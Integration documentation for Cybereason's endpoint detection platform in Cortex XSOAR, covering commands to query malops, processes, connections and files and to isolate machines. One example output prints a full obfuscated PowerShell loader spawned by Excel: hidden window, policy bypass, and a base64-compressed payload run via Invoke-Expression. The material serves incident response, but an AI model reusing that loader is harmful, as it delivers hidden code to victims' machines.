Cybereason

This Integration is part of the Cybereason Pack.#

Cybereason is an endpoint detection and response platform used through Cortex XSOAR to manage and query malops, connections, and processes.

This integration was integrated and tested with Cybereason v17.5.20.

Important Notes

The integration supports both basic and client-certification authentications.
Decrypt certificate .pfx file outside of Cortex XSOAR.
If you plan to fetch incidents, read the important notes in the Fetched Incidents Data section.
Insert the decrypted certificate in the Certificate field under the Credentials tab, according to the following template.

Bag Attributes
<ATTRIBUTES>
-----BEGIN CERTIFICATE-----
<CERTIFICATE>
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
<KEY>
-----END RSA PRIVATE KEY-----

Configure Cybereason on Cortex XSOAR

Navigate to Settings > Integrations > Servers & Services .
Search for Cybereason.
Click Add instance to create and configure a new integration instance.
- Name : a textual name for the integration instance.
- Server URL (e.g. https://192.168.0.1 )
- Credentials
- Trust any certificate (not secure)
- Use system proxy settings
- Fetch incidents
- Incident type
Click Test to validate the URLs, token, and connection.

Fetched Incidents Data

Cortex XSOAR fetches the first batch of Cybereason malops from the previous three days.
After the first batch of fetched malops, Cortex XSOAR fetches new Cybereason malops as soon as they are generated in Cybereason.

IMPORTANT : In order to properly fetch incidents, you need to set the pre-processing script to CybereasonPreProcessing for the incident type you configure in each integration instance. For example, if you select the Malware, you need to configure the pre-processing script for the Malware incident type to CybereasonPreProcessing .

Integration Instance Configuration

Malware Indicator Type Configuration

Commands

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

Search for processes: cybereason-query-processes
Check connection to Cybereason server: cybereason-is-probe-connected
Search for connections: cybereason-query-connections
Isolate a machine from the network: cybereason-isolate-machine
Take machine out of isolation: cybereason-unisolate-machine
Get a list and details for all malops: cybereason-query-malops
Get a list of all malops: cybereason-malop-processes
Add a comment to a malop: cybereason-add-comment
Update malop status: cybereason-update-malop-status
Prevent a malop process file: cybereason-prevent-file
Allow a malop process file: cybereason-unprevent-file
Get information for a file: cybereason-query-file
Get information for a domain: cybereason-query-domain
Get information for a user: cybereason-query-user

1. Search for processes

Searches for processes with various filters.

Base Command

cybereason-query-processes

Input

Argument Name	Description	Required
machine	Machine hostname	Optional
onlySuspicious	Show only suspicious processes	Optional
limit	Maximum number of results to retrieve	Optional
processName	Process name to filter by	Optional
saveToContext	If true, save the result to the context	Optional
hasIncomingConnection	Filter only processes with incoming connections	Optional
hasOutgoingConnection	Filter only processes with outgoing connections	Optional

Context Output

Path	Description
Process.Name	The process name
Process.Malicious	Malicious status of the process
Process.CreationTime	Process creation time
Process.EndTime	Process end time
Process.CommandLine	Command line of the process
Process.SignedAndVerified	Is the process signed and verified
Process.ProductType	Product type
Process.Children	Children of the process
Process.Parent	Parent process
Process.OwnerMachine	Machine hostname
Process.User	The user who ran the process
Process.ImageFile	Image file of the process
Process.SHA1	SHA-1 of the process file
Process.MD5	MD5 of the process file
Process.CompanyName	Company name
Process.ProductName	Product name

Command Example

!cybereason-query-processes machine=DESKTOP-VUO0QPN hasOutgoingConnection=true hasIncomingConnection=true

Context Example

{
    "Process": [
        {
            "CommandLine": "C:\\Windows\\system32\\svchost.exe -k LocalService",
            "CompanyName": "Microsoft Corporation",
            "CreationTime": "2018-08-06T23:46:30",
            "EndTime": "2018-08-06T23:45:11",
            "ImageFile": "svchost.exe",
            "MD5": "32569e403279b3fd2edb7ebd036273fa",
            "Malicious": "indifferent",
            "Name": "svchost.exe",
            "OwnerMachine": "DESKTOP-VUO0QPN",
            "Parent": "services.exe",
            "ProductName": "Microsoft® Windows® Operating System",
            "ProductType": "SVCHOST",
            "SHA1": "660b76b6fb802417d513adc967c5caf77fc2bac6",
            "SignedandVerified": "true",
            "User": "desktop-vuo0qpn\\local service"
        }
    ]
}

Human Readable Output

Cybereason Processes

Name	Malicious	Creation Time	End Time	Command Line	Signed and Verified	Product Type	Children	Parent	Owner Machine	User	Image File	SHA1	MD5	Company Name	Product Name
svchost.exe	indifferent	2018-08-06T23:46:30	2018-08-06T23:45:11	C:\Windows\system32\svchost.exe -k LocalService	true	SVCHOST		services.exe	DESKTOP-VUO0QPN	desktop-vuo0qpn\local service	svchost.exe	660b76b6fb802417d513adc967c5caf77fc2bac6	32569e403279b3fd2edb7ebd036273fa	Microsoft Corporation	Microsoft® Windows® Operating System

2. Check connection to Cybereason server

Checks if the machine is currently connected to the Cybereason server.

Base Command

cybereason-is-probe-connected

Input

Argument Name	Description	Required
machine	Hostname of the machine to check	Required

Context Output

Path	Type	Description
Cybereason.Machine.isConnected	boolean	true if machine is connected, false if machine is not connected
Cybereason.Machine.Name	string	Machine name

Command Example

!cybereason-is-probe-connected machine=DESKTOP-VUO0QPN

Context Example

{
    "Cybereason": {
      "Machine":
        "Name": "DESKTOP-VUO0QPN",
        "isConnected": true
      }
    }
}

Human Readable Output

true

3. Search for connections

Searches for connections.

Base Command

cybereason-query-connections

Input

Argument Name	Description	Required
ip	Filter connections that contain this IP (in or out)	Optional
machine	Filter connections on the specified machine	Optional
saveToContext	If true , save the result to the context	Optional

Context Output

Path	Description
Connection.Name	Connection name
Connection.Direction	OUTGOING/INCOMING
Connection.ServerAddress	Address of the Cybereason machine
Connection.ServerPort	Port of the Cybereason machine
Connection.PortType	Connection type
Connection.ReceivedBytes	Received bytes count
Connection.TransmittedBytes	Transmitted bytes count
Connection.RemoteCountry	Connection's remote country
Connection.OwnerMachine	Machine hostname
Connection.OwnerProcess	The process that performed the connection
Connection.CreationTime	Connection creation time
Connection.EndTime	Connection end time

Command Example

!cybereason-query-connections ip=192.168.39.128

Context Example

{
    "Connection": [
        {
            "CreationTime": "2018-04-30T18:12:28",
            "Direction": "OUTGOING",
            "Name": "172.16.3.7:48300 \u003e 54.235.96.83:8443",
            "OwnerMachine": "ip-172-16-3-7.ec2.internal",
            "OwnerProcess": "cybereason-sens",
            "RemoteCountry": "United States",
            "ServerAddress": "54.235.96.83",
            "ServerPort": "8443"
        }
    ]
}

Human Readable Output

Cybereason Connections

Name	Direction	Server Address	Server Port	Port Type	Received Bytes	Transmitted Bytes	Remote Country	Owner Machine	Owner Process	Creation Time	End Time
172.16.3.7:48300 > 54.235.96.83:8443	OUTGOING	54.235.96.83	8443				United States	ip-172-16-3-7.ec2.internal	cybereason-sens	2018-04-30T18:12:28

4. Isolate machine from the network

Isolates a machine that has been infected from the rest of the network

Base Command

cybereason-isolate-machine

Input

Argument Name	Description	Required
machine	Machine name to be isolated	Required

Context Output

Path	Type	Description
Cybereason.Machine	string	Machine name
Cybereason.IsIsolated	boolean	Is the machine isolated
Endpoint.Hostname	string	Machine name

Command Example

!cybereason-isolate-machine machine=DESKTOP-VUO0QPN

Context Example

{
    "Cybereason": {
        "IsIsolated": true,
        "Machine": "DESKTOP-VUO0QPN"
    },
    "Endpoint": {
        "Hostname": "DESKTOP-VUO0QPN"
    }
}

Human Readable Output

Machine was isolated successfully.

5. Take machine out of isolation

Returns a machine that was isolated from the network.

Base Command

cybereason-unisolate-machine

Input

Argument Name	Description	Required
machine	Name of machine to take out of isolation	Required

Context Output

Path	Type	Description
Cybereason.Machine	string	Machine name
Cybereason.IsIsolated	boolean	Is the machine isolated
Endpoint.Hostname	string	Machine name

Command Example

!cybereason-unisolate-machine machine=DESKTOP-VUO0QPN raw-response=true

Context Example

{
    "Cybereason": {
        "IsIsolated": false,
        "Machine": "DESKTOP-VUO0QPN"
    },
    "Endpoint": {
        "Hostname": "DESKTOP-VUO0QPN"
    }
}

Human Readable Output

Machine was un-isolated successfully.

6. Get a list and details for all malops

Returns a list and details of all malops.

Base Command

cybereason-query-malops

Input

Argument Name	Description	Required
filters	The filters to filter the response by (given in Cybereason API syntax)	Optional
totalResultLimit	The total number of results to return for your server. To reduce system overload and maximize server performance, make sure the limit is a reasonable number.	Optional
perGroupLimit	The number of items to return for each malop group	Optional
templateContext	The level of detail to provide in the response. Possible values include: SPECIFIC: References value contain only the count in the ElementValues class. The Suspicions map is calculated for each results, with the suspicion name and the first time the suspicion appeared. The Evidence map is not calculated for the results. CUSTOM: Reference values contain the specific Elements, up to the limit defined in the perFeatureLimit parameter. The Suspicions map is not calculated for the results. The Evidence map is not calculated for the results. DETAILS: Reference values contain the specific Elements, up to the limit defined in the perFeatureLimit parameter. The Suspicions map is calculated for each result, containing the suspicion name and the first time the suspicion appeared. The Evidence map is not calculated for the results.	Optional
withinLastDays	Return all the malops within the last days	Optional

Context Output

Path	Type	Description
Cybereason.Malops.GUID	string	Malop GUID
Cybereason.Malops.CreationTime	string	The time reported as when the malicious behavior began on the system. This is not the time the malop was first detected by Cybereason.
Cybereason.Malops.DecisionFeature	string	The reason that Cybereason raised the malop
Cybereason.Malops.Link	string	Link to the malop on Cybereason
Cybereason.Malops.Suspects	string	Malop suspect type and name
Cybereason.Malops.LastUpdatedTime	string	Last updated time of malop
Cybereason.Malops.AffectedMachine	string	List of machines affected by this malop
Cybereason.Malops.InvolvedHash	string	List of file hashes involved in this malop

Command Example

!cybereason-query-malops

Context Example

{
    "Cybereason": {
      "Malops" : [
        {
            "CreationTime": "2018-04-30T14:05:14",
            "DecisionFailure": "maliciousExecutionOfPowerShell",
            "GUID": "11.8371241992421952627",
            "LastUpdateTime": "2018-04-30T14:07:29",
            "Link": "https://integration.cybereason.net:8443/#/malop/11.8371241992421952627",
            "Suspects": "Process: powershell.exe"
        }
    ]
  }
}

Human Readable Output

Cybereason Malops

GUID	Link	CreationTime	LastUpdateTime	DecisionFailure	Suspects
11.8371241992421952627	https://integration.cybereason.net:8443/#/malop/11.8371241992421952627	2018-04-30T14:05:14	2018-04-30T14:07:29	maliciousExecutionOfPowerShell	Process: powershell.exe

7. Get a list of all malops

Returns a list of malops.

Base Command

cybereason-malop-processes

Input

Argument Name	Description	Required
malopGuids	Array of malop GUIDs (comma-separated). Retrieve the Malop GUID using the `cybereason-query-malops` .	Required
machinename	A CSV list of machine names affected by malops, for example, "machine1,machine2"	Optional

Context Output

Path	Type	Description
Process.Name	string	Process name
Process.Malicious	unknown	Malicious status of the process
Process.CreationTime	date	Process creation time
Process.EndTime	date	Process end time
Process.CommandLine	string	The command line of the process
Process.SignedAndVerified	unknown	Is the process signed and verified
Process.ProductType	unknown	Product type
Process.Children	unknown	Children of the process
Process.Parent	unknown	Parent process
Process.OwnerMachine	unknown	Machine hostname
Process.User	string	The user who ran the process
Process.ImageFile	unknown	Image file of the process
Process.SHA1	string	SHA-1 of the process file
Process.MD5	string	MD5 of the process file
Process.CompanyName	string	Company name
Process.ProductName	string	Product name

Command Example

!cybereason-malop-processes malopGuids=11.8371241992421952627

Context Example

{
    "Process": [
        {
            "CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtc9o4EP7Or9jx6GbsCVbMS2mCJzOl0LTcFZoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtx//DT8/Y/Po/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVftN5e3Nr0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5/htukcXrMb2JNlyd7yG5S2fi4VFhdErjqmwLOrOyDhzF5x42omQ5WAm7AiTjArCelnLlcmcuYHv+JHlv5Fdg57SLUKsNWwn7GS6JwUCIefKyD/HHzgMkQKBbLPUA0VLuxtybf/GY9HXIdK1ILtHA4XAKs9IGOwSXzn+SQGVxjotPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGdbt5vtXC8skCcaNkWfV78kuMzyhY27oE1/0Rcwloif0E8qF64yi6Gwrz7h22QqPrDpYI/USC8Gu29RDVJWkqLiFQJ6jyfADdGjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG7dN2ujcUI82vJtuu926JtICzKIwCOm45XjihfJkwfWAL2MZH9tKnsEd4ziAheitpgWuRCtLWcDhuHNfXUAGbsqyzEQ6r5Hijqhu95fnwquTtBJJ3Stanufh0vYcf1Y16zGXJk44xeniWqUTrjcxyoWOmM4iJubdbl+lO5ukdfDqMDsN4dwmBYofjVbTdpw6nEHK0jDk8pVAxDop6uXilUOicuPKXOBNH18CdyI4T3FWeKBQijedtucd8O0Kov3hXw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"",
            "CompanyName": "Microsoft Corporation",
            "CreationTime": "2018-04-30T14:05:49",
            "EndTime": "2018-04-30T14:06:22",
            "ImageFile": "powershell.exe",
            "MD5": "92f44e405db16ac55d97e3bfe3b132fa",
            "Malicious": "indifferent",
            "Name": "powershell.exe",
            "OwnerMachine": "ROBERTE-EXCASST",
            "Parent": "excel.exe",
            "ProductName": "Microsoft® Windows® Operating System",
            "SHA1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d",
            "User": "darkcap\\roberte"
        }
    ]
}

Human Readable Output

Cybereason Malop Processes

Name	Malicious	Creation Time	End Time	Command Line	Parent	Owner Machine	User	Image File	SHA1	MD5	Company Name	Product Name
powershell.exe	indifferent	2018-04-30T14:05:49	2018-04-30T14:06:22	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtc9o4EP7Or9jx6GbsCVbMS2mCJzOl0LTcFZoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtx//DT8/Y/Po/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVftN5e3Nr0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5/htukcXrMb2JNlyd7yG5S2fi4VFhdErjqmwLOrOyDhzF5x42omQ5WAm7AiTjArCelnLlcmcuYHv+JHlv5Fdg57SLUKsNWwn7GS6JwUCIefKyD/HHzgMkQKBbLPUA0VLuxtybf/GY9HXIdK1ILtHA4XAKs9IGOwSXzn+SQGVxjotPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGdbt5vtXC8skCcaNkWfV78kuMzyhY27oE1/0Rcwloif0E8qF64yi6Gwrz7h22QqPrDpYI/USC8Gu29RDVJWkqLiFQJ6jyfADdGjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG7dN2ujcUI82vJtuu926JtICzKIwCOm45XjihfJkwfWAL2MZH9tKnsEd4ziAheitpgWuRCtLWcDhuHNfXUAGbsqyzEQ6r5Hijqhu95fnwquTtBJJ3Stanufh0vYcf1Y16zGXJk44xeniWqUTrjcxyoWOmM4iJubdbl+lO5ukdfDqMDsN4dwmBYofjVbTdpw6nEHK0jDk8pVAxDop6uXilUOicuPKXOBNH18CdyI4T3FWeKBQijedtucd8O0Kov3hXw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"	excel.exe	ROBERTE-EXCASST	darkcap\roberte	powershell.exe	04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d	92f44e405db16ac55d97e3bfe3b132fa	Microsoft Corporation	Microsoft® Windows® Operating System

8. Add a comment to a malop

Adds a new comment to a malop.

Base Command

cybereason-add-comment

Input

Argument Name	Description	Required
comment	Comment to add to the malop.	Required
malopGuid	GUID of the malop to add the comment to. Retrieve the Malop GUID using the `cybereason-query-malops` .	Required

Context Output

There is no context output for this command.

Command Example

!cybereason-add-comment comment=NewComment malopGuid=11.8371241992421952627

Human Readable Output

Comment added successfully

9. Update malop status

Updates a malop status.

Base Command

cybereason-update-malop-status

Input

Argument Name	Description	Required
malopGuid	GUID of the malop to update the status of	Required
status	Status to update	Required

Context Output

Path

Type

Description

Cybereason.Malops.GUID

string

Malop GUID

Cybereason.Malops.Status

string

Malop status:

To Review
Unread
Remediated
Not Relevant

Command Example

!cybereason-update-malop-status malopGuid=11.8371241992421952627 status="To Review"

Context Example

{
    "Cybereason": {
      "Malops":
        "GUID": "11.8371241992421952627",
        "Status": "To Review"
       }
    }
}

Human Readable Output

Successfully updated malop 11.8371241992421952627 to status To Review

10. Prevent a malop process file

Prevent malop process file from running on the machine.

Base Command

cybereason-prevent-file

Input

Argument Name	Description	Required
hash	MD5 of the malop process file to prevent	Required

Context Output

Path	Type	Description
Process.MD5	string	Process file MD5
Process.Prevent	boolean	True if process file is prevented

Command Example

!cybereason-prevent-file hash=6fb065fcff8d92da51bba667dc9f770c

Context Example

{
  "Process": {
    "MD5": "6fb065fcff8d92da51bba667dc9f770c",
    "Prevent": true
  }
}

Human Readable Output

File was prevented successfully.

11. Allow a malop process file

Allow a malop process file to run on the machine.

Base Command

cybereason-unprevent-file

Input

Argument Name	Description	Required
hash	MD5 of the malop process file to allow	Required

Context Output

Path	Type	Description
Process.MD5	string	Process file MD5
Process.Prevent	boolean	True if process file is prevented

Command Example

!cybereason-unprevent-file hash=6fb065fcff8d92da51bba667dc9f770c

Context Example

{
  "Process": {
    "MD5": "6fb065fcff8d92da51bba667dc9f770c",
    "Prevent": false
  }
}

Human Readable Output

File was unprevented successfully.

12. Get information for a file

Query files as part of investigation.

Base Command

cybereason-query-file

Input

Argument Name	Description	Required
file_hash	File hash (SHA-1 and MD5 supported)	Required

Context Output

Path	Type	Description
Cybereason.File.Path	string	File path
Cybereason.File.SHA1	string	File SHA-1 hash
Cybereason.File.Machine	string	Machine name on which file is located
Cybereason.File.SuspicionsCount	number	File suspicions count
Cybereason.File.Name	string	File name
Cybereason.File.CreationTime	date	File creation time
Cybereason.File.Suspicion	string	File suspicions object of suspicion as key and detected date as value
Cybereason.File.OSVersion	string	Machine OS version on which the file is located
Cybereason.File.ModifiedTime	date	File modified date
Cybereason.File.Malicious	boolean	Is file malicious
Cybereason.File.Company	string	Company name
Cybereason.File.MD5	string	File MD5 hash
Cybereason.File.IsConnected	boolean	Is machine connected to Cybereason
Cybereason.File.Signed	boolean	Is file signed
Cybereason.File.Evidence	string	File evidences
Endpoint.Hostname	string	Hostname on which file is located
Endpoint.OSVersion	string	Machine OS version on which the file is located
File.Hostname	string	Hostname on which file is located
File.MD5	string	File MD5 hash
File.SHA1	string	File SHA-1 hash
File.Name	string	File name
File.Path	string	File path

Command Example

!cybereason-query-file file_hash=d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f

Context Example

{
    "Cybereason": {
        "File": [
        {
            "Company": "company",
            "CreationTime": "2018-09-25T20:10:38.000Z",
            "Evidence": [
                "mimikatzResourceEvidence",
                "reportedByAntiMalwareEvidence",
                "malwareClassificationEvidence",
                "hasLegitClassificationEvidence",
                "hasNonLegitClassificationEvidence",
                "whitelistClassificationEvidence"
            ],
            "IsConnected": false,
            "MD5": "b5962945811f8d275a3a69334dbc81e8",
            "Machine": "DESKTOP-UNQ8LCD",
            "Malicious": false,
            "ModifiedTime": "2018-11-14T20:02:34.000Z",
            "Name": "mimikatz.exe",
            "OSVersion": "Windows_10",
            "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe",
            "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f",
            "Signed": true,
            "Suspicion": {
                "fileReputationSuspicion": "2018-11-14T20:02:52.000Z",
                "mimikatzSuspicion": "2018-11-14T20:02:52.000Z",
                "reportedByAntiMalwareSuspicion": "2018-11-27T20:56:54.000Z"
            },
            "SuspicionsCount": 3
        }
    ]
    },
    "Endpoint": [
        {
            "Hostname": "DESKTOP-UNQ8LCD",
            "OSVersion": "Windows_10"
        }
    ],
    "File": [
        {
            "Hostname": "DESKTOP-UNQ8LCD",
            "MD5": "b5962945811f8d275a3a69334dbc81e8",
            "Name": "mimikatz.exe",
            "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe",
            "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f"
        }
    ]
}

Human Readable Output

13. Get information for a domain

Query domains as part of investigation.

Base Command

cybereason-query-domain

Input

Argument Name	Description	Required
domain	Domain to query	Required

Context Output

Path	Type	Description
Cybereason.Domain.Name	string	Domain name
Cybereason.Domain.Malicious	boolean	Is domain malicious
Cybereason.Domain.IsInternalDomain	boolean	Is domain internal
Cybereason.Domain.Reputation	string	Domain reputation
Cybereason.Domain.SuspicionsCount	number	Domain suspicions count
Cybereason.Domain.WasEverResolved	boolean	Was domain ever resolved
Cybereason.Domain.WasEverResolvedAsASecondLevelDomain	boolean	Was domain ever resolved as a second-level domain
Domain.Name	string	Domain name

Command Example

!cybereason-query-domain domain=www2.bing.com

Context Example

{
    "Cybereason": {
     "Domain": [
        {
            "IsInternalDomain": false,
            "Malicious": false,
            "Name": "www2.bing.com",
            "Reputation": "indifferent",
            "SuspicionsCount": 0,
            "WasEverResolved": true,
            "WasEverResolvedAsASecondLevelDomain": true
        }
    ],
    "Domain": [
        {
            "Name": "www2.bing.com"
        }
    ]
  }
}

Human Readable Output

14. Get information for a user

Query users as part of investigation.

Base Command

cybereason-query-user

Input

Argument Name	Description	Required
username	Username to query	Required

Context Output

Path	Type	Description
Cybereason.User.Username	string	User name
Cybereason.User.Domain	string	User domain
Cybereason.User.LastMachineLoggedInTo	string	Last machine the user logged in to
Cybereason.User.LocalSystem	boolean	Is local system
Cybereason.User.Organization	string	User organization

Command Example

!cybereason-query-user username="ec2amaz-5man2hc\\network service"

Context Example

{
    "Cybereason": {
     "User": [
        {
            "Domain": "ec2amaz-5man2hc",
            "LastMachineLoggedInTo": "EC2AMAZ-5MAN2HC",
            "LocalSystem": true,
            "Organization": "INTEGRATION",
            "Username": "ec2amaz-5man2hc\\network service"
        }
    ]
  }
}